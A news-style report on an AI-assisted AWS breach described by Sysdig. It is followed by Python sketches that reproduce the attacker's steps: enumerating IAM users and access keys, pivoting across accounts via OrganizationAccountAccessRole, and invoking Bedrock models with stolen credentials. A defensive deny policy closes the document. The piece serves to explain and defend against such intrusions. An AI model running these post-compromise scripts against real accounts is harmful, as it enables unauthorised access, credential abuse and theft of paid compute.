A recent security breach on AWS showcases the alarming capabilities of AI-assisted cyberattacks: researchers observed an intruder gain administrative access in under ten minutes. The Sysdig Threat Research Team noted both the attack's speed and its use of large language models (LLMs) to automate everything from reconnaissance to writing malicious code to LLMjacking. The threat actor compromised 19 AWS principals, abused Amazon Bedrock models, and consumed GPU compute resources, indicating a sophisticated, well-coordinated operation.

The attack began with credentials stolen from public Amazon S3 buckets that contained sensitive data, including Retrieval-Augmented Generation (RAG) data for AI models. The attacker's code, which carried comments written in Serbian, listed IAM users and their access keys and included comprehensive exception handling. References to non-existent GitHub repositories, together with the LLM-generated code and its Serbian comments, further pointed to AI assistance.

The intruder then attempted to assume OrganizationAccountAccessRole across a list of accounts that included account IDs outside the victim's organization, a behavior consistent with AI hallucinations. Through this access the attacker reached sensitive data: secrets, SSM parameters, CloudWatch logs, and internal data in S3 buckets.

The LLMjacking phase targeted cloud-hosted LLMs, with the attacker abusing Amazon Bedrock access to invoke multiple models. To defend against similar intrusions, Sysdig recommends restricting permissions, enabling logging, and hardening identity security, emphasizing the need for proactive defenses against evolving AI-driven threats.
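To make the reconnaissance step concrete, the kind of IAM enumeration described above can be sketched with boto3. This is a minimal illustration, not the attacker's actual script: it assumes already-configured (in the attack, stolen) AWS credentials, and `format_finding` is a hypothetical helper added here for readability.

```python
def format_finding(user_name, key_ids):
    """Pure helper (hypothetical): render one enumeration result line."""
    return f"{user_name}: {', '.join(key_ids) or '(no keys)'}"

def enumerate_users_and_keys():
    """List every IAM user in the account and the access keys attached to each.

    Returns {user_name: [access_key_id, ...]}. Mirrors the broad per-call
    exception handling observed in the attacker's LLM-generated code.
    """
    import boto3
    from botocore.exceptions import ClientError

    iam = boto3.client("iam")
    results = {}
    for page in iam.get_paginator("list_users").paginate():
        for user in page["Users"]:
            name = user["UserName"]
            try:
                keys = iam.list_access_keys(UserName=name)
                results[name] = [k["AccessKeyId"] for k in keys["AccessKeyMetadata"]]
            except ClientError as err:
                # Swallow per-user errors and keep enumerating, as the
                # attacker's comprehensive exception handling did.
                results[name] = [f"error: {err.response['Error']['Code']}"]
            print(format_finding(name, results[name]))
    return results
```

Defensively, this is exactly the pattern that CloudTrail logging of `ListUsers` and `ListAccessKeys` calls in rapid succession can surface.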
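The cross-account pivot via OrganizationAccountAccessRole boils down to an STS `AssumeRole` call per candidate account ID. A minimal sketch follows; the session name and function names are hypothetical, and a hallucinated, non-victim account ID simply produces an `AccessDenied` error, as seen in the attack.

```python
def build_assume_role_request(account_id: str) -> dict:
    """Pure helper: AssumeRole parameters targeting the default
    OrganizationAccountAccessRole in a member account."""
    return {
        "RoleArn": f"arn:aws:iam::{account_id}:role/OrganizationAccountAccessRole",
        "RoleSessionName": "recon-session",  # hypothetical session name
    }

def try_assume_role(account_id: str):
    """Attempt the pivot; returns temporary credentials or None on failure."""
    import boto3
    from botocore.exceptions import ClientError

    sts = boto3.client("sts")
    try:
        resp = sts.assume_role(**build_assume_role_request(account_id))
        return resp["Credentials"]
    except ClientError:
        # Role missing or access denied, e.g. an account ID the LLM hallucinated.
        return None
```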
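The LLMjacking phase itself needs little more than the `bedrock-runtime` `InvokeModel` API. A hedged sketch, assuming an Anthropic-messages-style model on Bedrock (the request-body shape shown is the Bedrock messages format; the model ID and prompt are placeholders, not ones reported from the incident):

```python
import json

def build_messages_body(prompt: str, max_tokens: int = 512) -> str:
    """Pure helper: serialize an Anthropic-messages request body for Bedrock."""
    return json.dumps({
        "anthropic_version": "bedrock-2023-05-31",
        "max_tokens": max_tokens,
        "messages": [{"role": "user", "content": prompt}],
    })

def invoke_bedrock_model(model_id: str, prompt: str) -> str:
    """Invoke a Bedrock-hosted model with stolen-credential access.

    Each successful call bills the victim account, which is the economic
    point of LLMjacking.
    """
    import boto3

    runtime = boto3.client("bedrock-runtime")
    resp = runtime.invoke_model(modelId=model_id, body=build_messages_body(prompt))
    payload = json.loads(resp["body"].read())
    return payload["content"][0]["text"]
```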
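On the defensive side, the "restrict permissions" recommendation can be made concrete with an explicit-deny policy for Bedrock invocation, attached where model access is not needed. This is one illustrative approach, not Sysdig's prescribed control; the policy and function names here are hypothetical.

```python
import json

# Hypothetical deny policy: block Bedrock model invocation for principals
# that have no business calling models, limiting LLMjacking blast radius.
DENY_BEDROCK_INVOKE = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "DenyBedrockInvoke",
        "Effect": "Deny",
        "Action": [
            "bedrock:InvokeModel",
            "bedrock:InvokeModelWithResponseStream",
        ],
        "Resource": "*",
    }],
}

def create_deny_policy(name: str):
    """Create the managed policy in IAM (requires iam:CreatePolicy)."""
    import boto3

    iam = boto3.client("iam")
    return iam.create_policy(
        PolicyName=name,
        PolicyDocument=json.dumps(DENY_BEDROCK_INVOKE),
    )
```

Pairing a policy like this with Bedrock model-invocation logging and CloudTrail gives both prevention and the audit trail needed to spot abuse quickly.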